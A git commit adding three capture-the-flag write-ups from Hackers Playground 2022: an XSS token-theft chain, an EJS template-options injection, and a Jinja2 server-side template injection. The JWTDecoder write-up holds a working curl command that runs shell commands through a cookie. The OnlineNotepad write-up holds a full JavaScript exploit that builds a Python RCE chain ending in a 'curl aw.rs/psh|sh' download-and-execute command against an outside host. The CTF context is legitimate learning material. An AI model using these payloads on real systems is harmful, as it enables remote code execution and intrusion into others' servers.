Add writeups for DatascienceClass, JWTDecoder, OnlineNotepad

William Bowling · William Bowling · commit af1bc0a2a6f0 · 2022-08-26T08:38:44.000+10:00
diff --git a/2022/Hackers-Playground-2022/DatascienceClass/README.md b/2022/Hackers-Playground-2022/DatascienceClass/README.md
@@ -0,0 +1,7 @@
+Vulnerable to `https://github.com/advisories/GHSA-hwvq-6gjx-j797` allowing xss, which can then:
+
+- Load an iframe at `hub/token`
+- Click the `Request new API token` button
+- Exfiltrate the token
+
+This token can then be used to authenticate as the admin and read the flag via a call to `/user/admin/api/contents/flag?content=1`
diff --git a/2022/Hackers-Playground-2022/JWTDecoder/README.md b/2022/Hackers-Playground-2022/JWTDecoder/README.md
@@ -0,0 +1,7 @@
+- The jwt cookie is decoded using `JsonCookies` which allows for a json object to be created
+- The decoded cookie is passed directly to the `app.render` function as the options
+- this allows for the `view options` setting to be set and arbitrary javascript run with the `outputFunctionName` option:
+
+```bash
+curl -g http://localhost:3000/ -H 'Cookie: jwt=j:{"settings":{"view options":{"outputFunctionName":"a%3b return global.process.mainModule.constructor._load(%27child_process%27).execSync(%27cat /flag.txt%27)%3b //"}}}
+```
diff --git a/2022/Hackers-Playground-2022/OnlineNotepad/README.md b/2022/Hackers-Playground-2022/OnlineNotepad/README.md
@@ -0,0 +1,55 @@
+- The memo body allows for control statements (eg `{% %}`) to be injected https://jinja.palletsprojects.com/en/3.1.x/templates/#list-of-control-structures
+- The memo body only allows 64 characters, but they can be combined by creating a variable then using `include` to extend it
+- An RCE payload can then be built up similar to https://secure-cookie.io/attacks/ssti/
+
+```javascript
+async function memo(userid, password, memo) {
+  const resp = await fetch("/memo/", {
+    method: "POST",
+    headers: { "Content-Type": "application/json" },
+    body: JSON.stringify({ userid, password, memo }),
+  });
+  return await resp.json();
+}
+
+async function ggg(payload, inc = true) {
+  await memo(
+    `vak${(i++).toString().padStart(2, "0")}`,
+    "super_secret",
+    `{%endraw%}{%${payload}%}{%include"vak${i
+      .toString()
+      .padStart(2, "0")}.html"%}{%raw%}`
+  );
+}
+
+var i = 1;
+var idx = 100; // remote
+// var idx = 81; // local
+
+await memo(
+  "vakzz",
+  "super_secret1",
+  `{%endraw%}{%include"vak01.html"%}{%raw%}`
+);
+await ggg(`set a="".__class__`);
+await ggg(`set a=a.__base__`);
+await ggg(`set b='__subcl'`);
+await ggg(`set b=b+'asses__'`);
+await ggg(`set a=a[b]()[${idx}]`);
+await ggg(`set a=a.__init__`);
+await ggg(`set a=a.__globals__`);
+await ggg(`set a=a['sys']`);
+await ggg(`set a=a.modules`);
+await ggg(`set a=a['os']`);
+await ggg(`set a=a.popen`);
+await ggg(`set c='curl aw'`);
+await ggg(`set c=c+'.rs/psh|sh'`);
+await ggg(`set a=a(c)`);
+await ggg(`set a=a.read()`);
+await memo(
+  `vak${(i++).toString().padStart(2, "0")}`,
+  "super_secret",
+  `{%endraw%}done{%raw%}`
+);
+await (await fetch("/memo/vakzz/super_secret1")).text();
+```
